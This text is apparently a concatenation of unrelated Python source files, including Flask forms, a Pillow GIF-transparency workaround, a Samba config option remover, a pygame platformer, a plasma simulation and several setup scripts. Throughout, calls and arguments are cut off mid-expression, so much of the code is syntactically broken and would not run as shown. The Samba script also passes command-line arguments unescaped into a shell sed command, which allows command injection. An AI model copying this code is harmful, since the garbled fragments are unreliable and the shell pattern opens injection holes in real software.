1 value
<gh_stars>0 from flask_wtf import FlaskForm from wtforms import StringField, PasswordField, SubmitField, BooleanField from wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError import email_validator from app.models import User import pickle class RegistrationForm(FlaskForm): username = StringField('UserName', validators=[DataRequired(), Length(min=2, max=20)]) email = StringField('Email', validators=[DataRequired(), Email()]) phone = StringField('Phone', validators=[DataRequired(), Length(10)]) password = PasswordField('Password', validators=[DataRequired()]) confirmPassword = PasswordField('Confirm Password', validators=[DataRequired(), EqualTo('password')]) submit = SubmitField('Sign Up') def validate_username(self, username): user = User.query.filter_by( if user: raise ValidationError( 'That username is taken. Please choose an another username') def validate_email(self, email): user = User.query.filter_by( if user: raise ValidationError( 'That email is taken. Please choose an another email') class LoginForm(FlaskForm): email = StringField('Email', validators=[DataRequired(), Email()]) password = PasswordField('Password', validators=[DataRequired()]) remember = BooleanField('Remember Me') submit = SubmitField('Login')
import os from nxpy.nxfile import NXFile def test_nxnode_resolve(): node = NXFile(os.path.join(os.path.dirname(__file__), 'map.nx')).get_root_node().resolve( "Tile/grassySoil.img/bsc/0") assert node.width == 90 node2 = NXFile(os.path.join(os.path.dirname(__file__), 'map.nx')).get_root_node().get_child('Tile').resolve( "grassySoil.img/bsc/0") assert node2.width == 90 node3 = NXFile(os.path.join(os.path.dirname(__file__), 'map.nx')).get_root_node().get_child('Tile').resolve( "grassySoil.img/bsc").get_child('0') assert node3.width == 90
<filename>colossus/apps/notifications/ from django.contrib import admin from colossus.apps.notifications import models as m
# This code adapted from to resolve an issue # described in # # There is a long-standing issue with the Pillow library that messes up GIF transparency by replacing the # transparent pixels with black pixels (among other issues) when the GIF is saved using # This code works around the issue and allows us to properly generate transparent GIFs. from typing import Tuple, List, Union from collections import defaultdict from random import randrange from itertools import chain from PIL.Image import Image class TransparentAnimatedGifConverter(object): _PALETTE_SLOTSET = set(range(256)) def __init__(self, img_rgba: Image, alpha_threshold: int = 0): self._img_rgba = img_rgba self._alpha_threshold = alpha_threshold def _process_pixels(self): """Set the transparent pixels to the color 0.""" self._transparent_pixels = set( idx for idx, alpha in enumerate( self._img_rgba.getchannel(channel="A").getdata() ) if alpha <= self._alpha_threshold ) def _set_parsed_palette(self): """Parse the RGB palette color `tuple`s from the palette.""" palette = self._img_p.getpalette() self._img_p_used_palette_idxs = set( idx for pal_idx, idx in enumerate(self._img_p_data) if pal_idx not in self._transparent_pixels ) self._img_p_parsedpalette = dict( (idx, tuple(palette[idx * 3 : idx * 3 + 3])) for idx in self._img_p_used_palette_idxs ) def _get_similar_color_idx(self): """Return a palette index with the closest similar color.""" old_color = self._img_p_parsedpalette[0] dict_distance = defaultdict(list) for idx in range(1, 256): color_item = self._img_p_parsedpalette[idx] if color_item == old_color: return idx distance = sum( ( abs(old_color[0] - color_item[0]), # Red abs(old_color[1] - color_item[1]), # Green abs(old_color[2] - color_item[2]), ) ) # Blue dict_distance[distance].append(idx) return dict_distance[sorted(dict_distance)[0]][0] def _remap_palette_idx_zero(self): """Since the first color is used in the palette, remap it.""" free_slots = self._PALETTE_SLOTSET - self._img_p_used_palette_idxs new_idx = free_slots.pop() if free_slots else self._get_similar_color_idx() self._img_p_used_palette_idxs.add(new_idx) self._palette_replaces["idx_from"].append(0) self._palette_replaces["idx_to"].append(new_idx) self._img_p_parsedpalette[new_idx] = self._img_p_parsedpalette[0] del self._img_p_parsedpalette[0] def _get_unused_color(self) -> tuple: """Return a color for the palette that does not collide with any other already in the palette.""" used_colors = set(self._img_p_parsedpalette.values()) while True: new_color = (randrange(256), randrange(256), randrange(256)) if new_color not in used_colors: return new_color def _process_palette(self): """Adjust palette to have the zeroth color set as transparent. Basically, get another palette index for the zeroth color.""" self._set_parsed_palette() if 0 in self._img_p_used_palette_idxs: self._remap_palette_idx_zero() self._img_p_parsedpalette[0] = self._get_unused_color() def _adjust_pixels(self): """Convert the pixels into their new values.""" if self._palette_replaces["idx_from"]: trans_table = bytearray.maketrans( bytes(self._palette_replaces["idx_from"]), bytes(self._palette_replaces["idx_to"]), ) self._img_p_data = self._img_p_data.translate(trans_table) for idx_pixel in self._transparent_pixels: self._img_p_data[idx_pixel] = 0 self._img_p.frombytes(data=bytes(self._img_p_data)) def _adjust_palette(self): """Modify the palette in the new `Image`.""" unused_color = self._get_unused_color() final_palette = chain.from_iterable( self._img_p_parsedpalette.get(x, unused_color) for x in range(256) ) self._img_p.putpalette(data=final_palette) def process(self) -> Image: """Return the processed mode `P` `Image`.""" self._img_p = self._img_rgba.convert(mode="P") self._img_p_data = bytearray(self._img_p.tobytes()) self._palette_replaces = dict(idx_from=list(), idx_to=list()) self._process_pixels() self._process_palette() self._adjust_pixels() self._adjust_palette()["transparency"] = 0["background"] = 0 return self._img_p def _create_animated_gif( images: List[Image], durations: Union[int, List[int]] ) -> Tuple[Image, dict]: """If the image is a GIF, create an its thumbnail here.""" save_kwargs = dict() new_images: List[Image] = [] for frame in images: thumbnail = frame.copy() # type: Image thumbnail_rgba = thumbnail.convert(mode="RGBA") thumbnail_rgba.thumbnail(size=frame.size, reducing_gap=3.0) converter = TransparentAnimatedGifConverter(img_rgba=thumbnail_rgba) thumbnail_p = converter.process() # type: Image new_images.append(thumbnail_p) output_image = new_images[0] save_kwargs.update( format="GIF", save_all=True, optimize=False, append_images=new_images[1:], duration=durations, disposal=2, # Other disposals don't work loop=0, ) return output_image, save_kwargs def save_transparent_gif( images: List[Image], durations: Union[int, List[int]], save_file ): """Creates a transparent GIF, adjusting to avoid transparency issues that are present in the PIL library Note that this does NOT work for partial alpha. The partial alpha gets discarded and replaced by solid colors. Parameters: images: a list of PIL Image objects that compose the GIF frames durations: an int or List[int] that describes the animation durations for the frames of this GIF save_file: A filename (string), pathlib.Path object or file object. (This parameter corresponds and is passed to the method.) Returns: Image - The PIL Image object (after first saving the image to the specified target) """ root_frame, save_args = _create_animated_gif(images, durations), **save_args)
import tensorflow as tf class XTensorBoardCallback(tf.keras.callbacks.TensorBoard): """ TensorBoard logging with a learning rate added. """ def __init__(self, log_dir, **kwargs): super().__init__(log_dir=log_dir, **kwargs) def on_epoch_end(self, epoch, logs=None): logs.update({"lr": tf.keras.backend.get_value(}) super().on_epoch_end(epoch, logs) def on_batch_end(self, batch, logs=None): logs.update({"lr": tf.keras.backend.get_value(}) super().on_batch_end(batch, logs)
<filename> # -*- coding: utf-8 -*- from setuptools import setup, find_packages with open("requirements.txt") as f: install_requires ="\n") # get version from __version__ variable in phytex_pharma_custom/ from phytex_pharma_custom import __version__ as version setup( name="phytex_pharma_custom", version=version, description="Phytex Pharma Customizations", author="MostafaFekry", author_email="<EMAIL>", packages=find_packages(), zip_safe=False, include_package_data=True, install_requires=install_requires )
import sys import configparser import os import subprocess SAMBA_CONFIG_PARSER = configparser.ConfigParser() SAMBA_FILE_PATH = '../smb.conf' BLOCKED_SECTIONS = ["global", "homes", "printers", "print$"] SECTION_NAME = sys.argv[2] OPTION_NAME = sys.argv[3] def section_exist(section_name): """ Takes section_name(str) argument and returns True if the given name exist """ return SAMBA_CONFIG_PARSER.has_section(section_name) def option_exist(section_name, option_name): """ Checks section_name(str) and option_name(str) and returns True if option exist """ return SAMBA_CONFIG_PARSER.has_option(section_name, option_name) def delete_option(section_name, option_name): ## I use % instead of .format cause /{:s} can not be seen by parser sed_script = "sed -i '/^\[%s\]/,/^\[.*$/{/%s.*/d}' %s" % (SECTION_NAME, OPTION_NAME, SAMBA_FILE_PATH) subprocess.Popen(sed_script, shell=True) def make_bash_call(stage_name): bash = ['python3.7', __file__, stage_name, sys.argv[2], sys.argv[3]] output = subprocess.Popen(bash, stdout=subprocess.PIPE).stdout return'utf-8') def automate(): before_output = make_bash_call('before') if before_output != "ok\n": print(before_output) exit() print('before ok') make_bash_call('run') after_output = make_bash_call('after') if after_output != 'ok\n': print(after_output) exit() print('after ok') def before(): if not section_exist(SECTION_NAME): print('Section : {:s} is not exist'.format(SECTION_NAME)) exit() if not option_exist(SECTION_NAME, OPTION_NAME): print('Option : {:s} is not exist'.format(OPTION_NAME)) exit() if OPTION_NAME == 'path': print('Option : {:s} can not be deleted'.format(OPTION_NAME)) exit() print('ok') def run(): delete_option(SECTION_NAME, OPTION_NAME) def after(): if option_exist(SECTION_NAME, OPTION_NAME): print("Option : {:s} is not exist".format(OPTION_NAME)) exit() print('ok') if __name__ == "__main__": globals()[sys.argv[1]]()
def main(): print_header() name = get_user_name() print("Hello {}".format(name)) def print_header(): print("--------------------------------") print(" THE MAIN APP ") print("--------------------------------") def get_user_name(): return input("What is your name? ") if __name__ == '__main__': main()
from gensim.models import FastText from gensim.models import word2vec import logging import argparse def fasttext_train(tool): assert tool == 'fasttext' or tool == 'word2vec', 'you can choose: [word2vec, fasttext]' logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO) sentences = word2vec.LineSentence(u'../corpus/scicite/all.txt') if tool == 'fasttext': _model = FastText(sentences, size=200, iter=30, min_count=2, word_ngrams=3) else: _model = word2vec.Word2Vec(sentences, size=100, iter=10, min_count=2)'../reference/wc_model/output') if __name__ == '__main__': parse = argparse.ArgumentParser(description="choose the way to train word vectors") parse.add_argument("--model", required=True, type=str, help="[word2vec, fasttext]") args = parse.parse_args() fasttext_train(args.model) import pickle if args.model == 'fasttext': model = FastText.load("../reference/wc_model/output") else: model = word2vec.Word2Vec.load("../reference/wc_model/output") dic = {} for i in model.wv.vocab: dic[i] = model.wv[i].tolist() pickle.dump(dic, open("../reference/output/wv.pkl", 'wb'))
<filename> import tensorflow as tf import numpy as np import PIL import glob import os import argparse def get_args(): my_parser = argparse.ArgumentParser() my_parser.add_argument('-p','--folder_path',type=str,help='Path to folder of frames',required=True) my_parser.add_argument('-m','--model_path',type=str,help='Path to weights file',required=True) my_parser.add_argument('-o','--output_path',type=str,help='Path to output folder',required=True) return my_parser def ssim(y_true,y_pred): return tf.image.ssim(y_true,y_pred,max_val=1.0) def psnr(y_true,y_pred): return tf.image.psnr(y_true,y_pred,max_val=1.0) def process_image_SR(impath): im = im = im.convert('YCbCr') # For single channel inference im = np.asanyarray(im) y = np.expand_dims(im[:,:,0],-1)/255 # Normalizing input uv = np.asanyarray(im)[:,:,1:] #print("uv:",uv.shape,"| y:",y.shape) return (y,uv) if __name__ == "__main__": physical_devices = tf.config.experimental.list_physical_devices("GPU") for i in physical_devices: tf.config.experimental.set_memory_growth(i, True) opt = get_args().parse_args() try: os.mkdir(opt.output_path) except: pass ARCNN = tf.keras.models.load_model(opt.model_path,custom_objects={"ssim":ssim,"psnr":psnr}) print("Looking at folder",os.path.join(opt.folder_path,"*")) flist = np.asarray(glob.glob(os.path.join(opt.folder_path,"*"))) count = 0 total = len(flist) print("Processing",total,"files") prog = tf.keras.utils.Progbar(total,unit_name='frames') div = len(flist)/8 rem = (len(flist)%8) *-1 print("rem:",rem) if(rem==0): rem_files = [] flist = flist.reshape(int(len(flist)/8),8) else: rem_files = flist[rem:] flist = flist[:rem].reshape(int(len(flist)/8),8) print("Batched Files:",len(flist)*4,"| rem =",len(rem_files)) for i in flist: im_y = [] im_uv = [] for j in range(8): y,uv = process_image_SR(i[j]) im_y.append(y) im_uv.append(uv) im_y = np.stack(im_y,axis=0) #print(im_y.shape) outs = ARCNN.predict(im_y) for y,uv,j in zip(outs,im_uv,range(8)): count += 1 out = y.reshape(im_y.shape[1], im_y.shape[2]) y_pred = np.stack([out*255,uv[:,:,0],uv[:,:,1]],axis=-1) y_pred= np.clip(y_pred,0,255).astype('uint8') y_pred = PIL.Image.fromarray(y_pred,mode='YCbCr').convert('RGB') fname = "out"+ i[j].split("/")[-1] converter = PIL.ImageEnhance.Color(y_pred) y_pred = converter.enhance(1.4) prog.update(count) #print("=",end="") print(count,"Files done") for i in rem_files: im_y,im_uv = process_image_SR(i) #print(im_y.shape) im_y = np.expand_dims(im_y,0) outs = ARCNN.predict(im_y) count += 1 out = outs.reshape(im_y.shape[1], im_y.shape[2]) #Removing batch dimensions y_pred = np.stack([out*255,im_uv[:,:,0],im_uv[:,:,1]],axis=-1) y_pred= np.clip(y_pred,0,255).astype('uint8') y_pred = PIL.Image.fromarray(y_pred,mode='YCbCr').convert('RGB') fname = "out"+ i.split("/")[-1] converter = PIL.ImageEnhance.Color(y_pred) y_pred = converter.enhance(1.4) prog.update(count) print("\nDone")
<reponame>slaclab/central_node_ioc<filename>CentralNodeApp/srcDisplay/ from os import path from pydm import Display from fault_list_item import FaultListItem import argparse class FaultPanel(Display): def __init__(self, fault_list=[], parent=None, args=[]): super(FaultPanel, self).__init__(parent=parent) parsed_args = self.parse_args(args) if parsed_args.fault_list: fault_list = self.fault_list_from_file(parsed_args.fault_list) for fault in fault_list: if not fault[0].startswith('#'): list_item = FaultListItem(fault_description=fault[1], fault_pv=fault[0], parent=self) self.faultList.layout().addWidget(list_item) self.faultList.layout().addStretch(0) self.scrollArea.setMinimumWidth(self.faultList.minimumSizeHint().width()) def parse_args(self, args): parser = argparse.ArgumentParser() parser.add_argument('--list', dest='fault_list', help='File containing a list of fault PV names to use.') parsed_args, _unknown_args = parser.parse_known_args(args) print(parsed_args) return parsed_args def fault_list_from_file(self, filename): if not path.isabs(filename): filename = path.join(path.dirname(__file__), filename) lines = [] with open(filename) as f: lines = f.readlines() return [l.strip().split('|') for l in lines] def ui_filename(self): return 'fault-panel.ui' def ui_filepath(self): return path.join(path.dirname(path.realpath(__file__)), self.ui_filename()) intelclass = FaultPanel
<reponame>neeravjain24/shogun #!/usr/bin/env python import shogun as sg traindat = '../data/fm_train_real.dat' testdat = '../data/fm_test_real.dat' parameter_list=[[traindat,testdat, 1.0],[traindat,testdat, 5.0]] def kernel_exponential (train_fname=traindat,test_fname=testdat, tau_coef=1.0): from shogun import kernel, distance, CSVFile feats_train=sg.features(CSVFile(train_fname)) feats_test=sg.features(CSVFile(test_fname)) distance = sg.distance('EuclideanDistance') kernel = sg.kernel('ExponentialKernel', width=tau_coef, distance=distance, cache_size=10) kernel.init(feats_train, feats_train) km_train=kernel.get_kernel_matrix() kernel.init(feats_train, feats_test) km_test=kernel.get_kernel_matrix() return km_train,km_test,kernel if __name__=='__main__': print('Exponential') kernel_exponential(*parameter_list[0])
print(detection_predictions[0]['labels'].size()[0], 'objects detected !') detection_predictions[0]
<gh_stars>1-10 #!/usr/bin/env python import os import sys from setuptools import setup, find_packages if sys.argv[-1] == 'publish': os.system('python sdist upload') sys.exit() with open('README') as readmeFile: long_desc = setup( name='miette', version='1.5', description='Miette is a light-weight Microsoft Office documents reader', long_description=long_desc, url='', author='<NAME>', author_email='<EMAIL>', packages=find_packages(), install_requires=['cfb'], license='BSD 2-Clause license', classifiers=( 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Natural Language :: English', 'Programming Language :: Python', 'Programming Language :: Python :: 2.7', 'Topic :: Software Development :: Libraries', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: Text Processing' ), )
import pygame pygame.init() display_width = 800 display_height = 600 gameDisplay = pygame.display.set_mode((display_width,display_height)) pygame.display.set_caption('A bit Racey') black = (0,0,0) white = (255,255,255) clock = pygame.time.Clock() crashed = False carImg_right = pygame.image.load('/Users/vladislavdevlikamov/Desktop/game/game/hh1.png') carImg_left = pygame.image.load('/Users/vladislavdevlikamov/Desktop/game/game/hh2.png') bg = pygame.image.load('/Users/vladislavdevlikamov/Desktop/game/game/tr.png') apple_image = pygame.image.load('/Users/vladislavdevlikamov/Desktop/game/game/apple.png') mushroom_image = pygame.image.load('/Users/vladislavdevlikamov/Desktop/game/game/mushroom.png') bird_left = pygame.image.load('/Users/vladislavdevlikamov/Desktop/game/game/bird.png') bird_right = pygame.image.load('/Users/vladislavdevlikamov/Desktop/game/game/bird1.png') trampoline = pygame.image.load('/Users/vladislavdevlikamov/Desktop/game/game/trampoline.png') banan_image = pygame.image.load('/Users/vladislavdevlikamov/Desktop/game/game/banana.png') class person(object): def __init__(self, x, y, car_speed, isJump, jumpCount, left): self.x = x self.y = y self.car_speed = car_speed self.isJump = isJump self.isTramp = False self.jumpCount = jumpCount self.jumpTramp = jumpCount self.left = left self.hitbox = pygame.Rect(self.x, self.y + 8, 61, 43) self.visible = True self.score = 0 def draw(self): if self.left == True: if self.visible == True: gameDisplay.blit(carImg_left, (self.x,self.y)) else: if self.visible == True: gameDisplay.blit(carImg_right, (self.x,self.y)) self.hitbox = pygame.Rect(self.x, self.y + 8, 61, 43) #pygame.draw.rect(gameDisplay, (255, 0, 0), self.hitbox, 2) class apple(object): def __init__(self, x, y, visible): self.x = x self.y = y self.visible = visible self.hitbox = pygame.Rect(self.x, self.y - 1, 61, 63) def draw(self): if self.visible == True: gameDisplay.blit(apple_image, (self.x, self.y)) self.hitbox = pygame.Rect(self.x, self.y - 1, 61, 63) #pygame.draw.rect(gameDisplay, (255, 0, 0), self.hitbox, 2) class mushroom(object): def __init__(self, x, y, visible): self.x = x self.y = y self.visible = visible self.hitbox = (self.x, self.y + 2, 61, 54) def draw(self): if self.visible == True: gameDisplay.blit(mushroom_image, (self.x, self.y)) self.hitbox = (self.x, self.y + 2, 61, 54) #pygame.draw.rect(gameDisplay, (255, 0, 0), self.hitbox, 2) class banana(object): def __init__(self, x, y, visible): self.x = x self.y = y self.visible = visible self.hitbox = (self.x, self.y + 2, 61, 54) def draw(self): if self.visible == True: gameDisplay.blit(banan_image, (self.x, self.y)) self.hitbox = (self.x, self.y + 2, 61, 54) #pygame.draw.rect(gameDisplay, (255, 0, 0), self.hitbox, 2) class bird(object): def __init__(self, x, y, speed): self.x = x self.y = y self.neg = 1 self.speed = speed self.hitbox = pygame.Rect(self.x, self.y + 2, 61, 54) self.visible = True def draw(self): if self.x + self.speed*self.neg >= display_width - 60: self.neg = -1 if self.x + self.speed*self.neg <= 0: self.neg = 1 self.x += self.speed*self.neg if self.neg == 1: if self.visible == True: gameDisplay.blit(bird_right, (self.x, self.y)) else: if self.visible == True: gameDisplay.blit(bird_left, (self.x, self.y)) self.hitbox = pygame.Rect(self.x, self.y + 2, 61, 54) #pygame.draw.rect(gameDisplay, (255, 0, 0), self.hitbox, 2) class tramp(object): def __init__(self, x, y): self.x = x self.y = y self.visible = True self.hitbox = pygame.Rect(self.x, self.y + 2, 63, 24) def draw(self): gameDisplay.blit(trampoline, (self.x, self.y)) #pygame.draw.rect(gameDisplay, (255, 0, 0), self.hitbox, 2) def end(): one_apple.visible = False second_apple.visible = False one_mushroom.visible = False second_mushroom.visible = False yozhyk.visible = False bird.visible = False text = font.render("End Game", 1, (0, 0, 0)) gameDisplay.blit(text, (350, 350)) yozhyk = person(10, display_height*0.7, 10, False, 10, False) one_apple = apple(250, display_height*0.7, True) second_apple = apple(600, display_height*0.7, True) one_mushroom = mushroom(100, display_height*0.7, True) second_mushroom = mushroom(400, display_height*0.7, True) banan = banana(500, display_height*0.1, True) tramp = tramp(500, display_height*0.7 + 8) bird = bird(10, display_height*0.4, 10) score = 0 font = pygame.font.SysFont("comiscans", 30, bold=True, italic=False) while not crashed: for event in pygame.event.get(): if event.type == pygame.QUIT: crashed = True keys = pygame.key.get_pressed() if keys[pygame.K_LEFT] and yozhyk.x > yozhyk.car_speed: yozhyk.left = True yozhyk.x -= yozhyk.car_speed if keys[pygame.K_RIGHT] and yozhyk.x < display_width - yozhyk.car_speed - 60: yozhyk.left = False yozhyk.x += yozhyk.car_speed if not(yozhyk.isJump): if keys[pygame.K_SPACE]: yozhyk.isJump = True else: if yozhyk.jumpCount >= -10: neg = 1 if yozhyk.jumpCount < 0: neg = -1 yozhyk.y -= (yozhyk.jumpCount ** 2) * 0.5 * neg yozhyk.jumpCount -= 1 else: yozhyk.isJump = False yozhyk.jumpCount = 10 if yozhyk.isTramp: if yozhyk.jumpTramp >= -10: neg = 1 if yozhyk.jumpTramp < 0: neg = -1 yozhyk.y -= (yozhyk.jumpTramp ** 2) * neg yozhyk.jumpTramp -= 1 else: yozhyk.isTramp = False yozhyk.jumpTramp = 10 gameDisplay.fill(white) gameDisplay.blit(bg, (0, 0)) if yozhyk.hitbox.colliderect(one_apple.hitbox) and one_apple.visible == True: one_apple.visible = False yozhyk.score += 1 if yozhyk.hitbox.colliderect(second_apple.hitbox) and second_apple.visible == True: second_apple.visible = False yozhyk.score += 1 if yozhyk.hitbox.colliderect(banan.hitbox) and banan.visible == True: banan.visible = False yozhyk.score += 1 if yozhyk.hitbox.colliderect(one_mushroom.hitbox) and one_mushroom.visible == True: one_mushroom.visible = False yozhyk.score -= 1 if yozhyk.hitbox.colliderect(second_mushroom.hitbox) and second_mushroom.visible == True: second_mushroom.visible = False yozhyk.score -= 1 if yozhyk.hitbox.colliderect(bird.hitbox): yozhyk.score -= 1 if yozhyk.hitbox.colliderect(tramp.hitbox): yozhyk.isTramp = True one_apple.draw() second_apple.draw() one_mushroom.draw() second_mushroom.draw() banan.draw() yozhyk.draw() bird.draw() tramp.draw() text = font.render("Score: " + str(yozhyk.score), 1, (0, 0, 0)) gameDisplay.blit(text, (650, 10)) pygame.display.update() clock.tick(60) pygame.quit() quit()
<reponame>TPei/jawbone_visualizer<filename>helper/ __author__ = 'TPei' import datetime def parse_date(date): """ parse date string looking like this December 6, 2014 at 5:17pm :param date: :return: datetime.datetime """ # used to get month no # '' at beginning of list so that month count starts at 1 months = ['', 'January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December'] # split by whitespace date = date.split() # get hour from hh:mm[AM/PM] substring hour = int(date[4][0:2]) # convert to 24h format if hour == 12: if date[4][5:7] == 'AM': hour = 0 elif date[4][5:7] == 'PM': hour += 12 # create datetime object date_time = datetime.datetime(int(date[2]), months.index(date[0]), int(date[1][:-1]), hour, int(date[4][3:5])) return date_time def parse_hm_time(hm_string): """ parse hm string looking like this "7h 20m" or "12m" :param hm_string: :return: datetime.timedelta """ hm = hm_string.split() if len(hm) == 1: return datetime.timedelta(minutes=int(hm[0][:-1])) return datetime.timedelta(hours=int(hm[0][:-1]), minutes=int(hm[1][:-1])) # quick and dirty unittest for myself def test_parse_date(): date = 'December 06, 2014 at 12:17AM' assert parse_date(date) == datetime.datetime(2014, 12, 6, 00, 17) date = 'December 06, 2014 at 12:17PM' assert parse_date(date) == datetime.datetime(2014, 12, 6, 12, 17) date = 'December 06, 2014 at 01:17PM' assert parse_date(date) == datetime.datetime(2014, 12, 6, 13, 17)
<reponame>Cam2337/snap-python import snap G = snap.GenPrefAttach(100000, 3) snap.PlotInDegDistr(G, "pref-attach", "PrefAttach(100000, 3) in Degree")
<reponame>bryancatanzaro/copperhead #!/usr/bin/env python # # Copyright 2008-2012 NVIDIA Corporation # Copyright 2009-2010 University of California # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # from distribute_setup import use_setuptools use_setuptools() from setuptools import setup from distutils.errors import CompileError from distutils.command.build_py import build_py as BuildPyCommand from distutils.command.build_ext import build_ext as BuildExtCommand from distutils.command.clean import clean as CleanCommand from distutils.cmd import Command import distutils.extension import subprocess import os.path import os import fnmatch try: subprocess.check_call(['scons'], shell=True) except subprocess.CalledProcessError: raise CompileError("Error while building Python Extensions") def remove_head_directories(path, heads=1): def explode_path(path): head, tail = os.path.split(path) return explode_path(head) + [tail] \ if head and head != path else [head or tail] exploded_path = explode_path(path) if len(exploded_path) < (heads+1): return '' else: return os.path.join(*exploded_path[heads:]) build_product_patterns = ['*.h', '*.hpp', '*.so', '*.dll', '*.dylib'] build_products = [] build_path = 'stage' for pattern in build_product_patterns: for root, dirs, files in os.walk(build_path): dir_path = remove_head_directories(root, 2) for filename in fnmatch.filter(files, pattern): build_products.append(os.path.join(dir_path, filename)) setup(name="copperhead", version="0.2a2", description="Data Parallel Python", long_description="Copperhead is a Data Parallel Python dialect, with runtime code generation and execution for CUDA, OpenMP, and TBB.", classifiers=[ 'Development Status :: 2 - Pre-Alpha', 'Intended Audience :: Developers', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: Apache Software License', 'Natural Language :: English', 'Programming Language :: Python', 'Topic :: Software Development :: Compilers', 'Topic :: Software Development :: Code Generators', 'Operating System :: POSIX :: Linux', 'Operating System :: MacOS :: MacOS X'], zip_safe=False, author="<NAME>, <NAME>", author_email="<EMAIL>, <EMAIL>", license = "Apache 2.0", package_dir = {'':'stage'}, # packages are under stage packages=['copperhead', 'copperhead.runtime', 'copperhead.compiler'], install_requires=["codepy>=2012.1.2"], package_data={ 'copperhead': build_products, }, url="" )
from phi.flow import * from functools import partial # Simulation parameters k0 = 0.15 # smallest wavenumber in the box x = 128 # x size y = 128 # y size dt = control(0.05) # timestep scale = 1 / 100 # Physical Parameters c1 = 0.1 # adiabatic coefficient [0, None] # Numerical Parameters arakawa_coeff = 1 # Poisson bracket coefficient kappa_coeff = 1 # background flow dy coefficient nu = 0.0005 # coefficient of hyperdiffusion N = 3 # laplace**(2*N) diffusion # Derived L = 2 * np.pi / k0 # Box Size dx = L / x # Grid Spacing nu = (-1) ** (N + 1) * nu # Smoothing coefficient & sign # Packing PARAMS = dict(c1=c1, nu=nu, N=N, arak=arakawa_coeff, kappa=kappa_coeff) def get_phi(plasma, guess=None): """Fourier Poisson Solve for Phi""" centered_omega = # - math.mean( phi = math.fourier_poisson(centered_omega.values, plasma.dx) # phi = math.solve_linear( # math.laplace,, guess, math.LinearSolve, callback=None # ) return CenteredGrid( phi,,, ) def diffuse(arr, N, dx): if not isinstance(N, int): print(f"{N} {type(N)}") for i in range(int(N)): arr = field.laplace(arr) # math.fourier_laplace(arr, dx) return arr def step_gradient_2d(plasma, phi, N=0, nu=0, c1=0, arak=0, kappa=0, dt=0): """time gradient of model""" # Calculate Gradients grad_phi = field.spatial_gradient(phi, stack_dim=channel("gradient")) dx_p, dy_p = grad_phi.values.gradient.unstack_spatial("x,y") # Get difference diff = phi - plasma.density # Step 2.1: New Omega. o = c1 * diff if arak: o += -arak * math._nd._periodic_2d_arakawa_poisson_bracket( phi.values,, plasma.dx # TODO: Fix dx ) if nu and N: o += nu * diffuse(, N=N, dx=plasma.dx) # Step 2.2: New Density. n = c1 * diff if arak: n += -arak * math._nd._periodic_2d_arakawa_poisson_bracket( phi.values, plasma.density.values, plasma.dx ) if kappa: n += -kappa * dy_p if nu: n += nu * diffuse(plasma.density, N=N, dx=plasma.dx) return math.Dict(density=n, omega=o, phi=phi, age=plasma.age + dt, dx=plasma.dx) def rk4_step(dt, physics_params, gradient_func=step_gradient_2d, **kwargs): gradient_func = partial(gradient_func, **physics_params) yn = math.Dict(**kwargs) # given dict to Namespace in_age = yn.age # Only in the first iteration recalculate phi if yn.age == 0: pn = get_phi(yn, guess=yn.phi) else: pn = yn.phi k1 = dt * gradient_func(yn, pn, dt=0) p1 = get_phi(yn + k1 * 0.5) # , guess=pn) k2 = dt * gradient_func(yn + k1 * 0.5, p1, dt=dt / 2) p2 = get_phi(yn + k2 * 0.5) # , guess=pn+p1*0.5) k3 = dt * gradient_func(yn + k2 * 0.5, p2, dt=dt / 2) p3 = get_phi(yn + k3) # , guess=pn+p2*0.5) k4 = dt * gradient_func(yn + k3, p3, dt=dt) y1 = yn + (k1 + 2 * k2 + 2 * k3 + k4) / 6 phi = get_phi(y1) # , guess=pn+p3*0.5) return math.Dict(density=y1.density,, phi=phi, age=in_age + dt, dx=yn.dx) domain = dict(extrapolation=extrapolation.PERIODIC, bounds=Box(x=L, y=L)) density = CenteredGrid(math.random_normal(spatial(x=x, y=y)), **domain) * scale omega = CenteredGrid(math.random_normal(spatial(x=x, y=y)), **domain) * scale phi = CenteredGrid(math.random_normal(spatial(x=x, y=y)), **domain) * scale age = 0 rk4 = partial(rk4_step, physics_params=PARAMS) print( "\n".join( [ f"x,y: {x}x{y}", f"L: {L}", f"c1: {c1}", f"dt: {dt}", f"N: {N}", f"nu: {nu}", f"scale: {scale}", ] ) ) for _ in view(density, omega, phi, play=False, framerate=10, namespace=globals()).range(): new_state = rk4(dt, density=density, omega=omega, phi=phi, age=age, dx=dx) density, omega, phi = new_state["density"], new_state["omega"], new_state["phi"] age += dt
# -*- coding: utf-8 -*- """Console script for BitcoinExchangeFH.""" import logging import click import yaml from befh import Configuration, Runner LOGGER = logging.getLogger(__name__) @click.command() @click.option( '--configuration', help='Configuration file.', required=True) @click.option( '--debug', default=False, is_flag=True, help='Debug mode.') @click.option( '--cold', default=False, is_flag=True, help='Cold start mode.') @click.option( '--archive', default=None, help='Manually archive the tables.', required=False) def main(configuration, debug, cold, archive): """Console script for BitcoinExchangeFH.""" if debug: level = logging.DEBUG else: level = logging.INFO logging.basicConfig( level=level, format='%(asctime)s %(levelname)s %(message)s') configuration = open(configuration, 'r') configuration = yaml.load(configuration, Loader=yaml.FullLoader) LOGGER.debug('Configuration:\n%s', configuration) configuration = Configuration(configuration) runner = Runner( config=configuration, is_debug=debug, is_cold=cold) runner.load() if archive is not None: runner.archive(date=archive) else: if __name__ == "__main__": main()
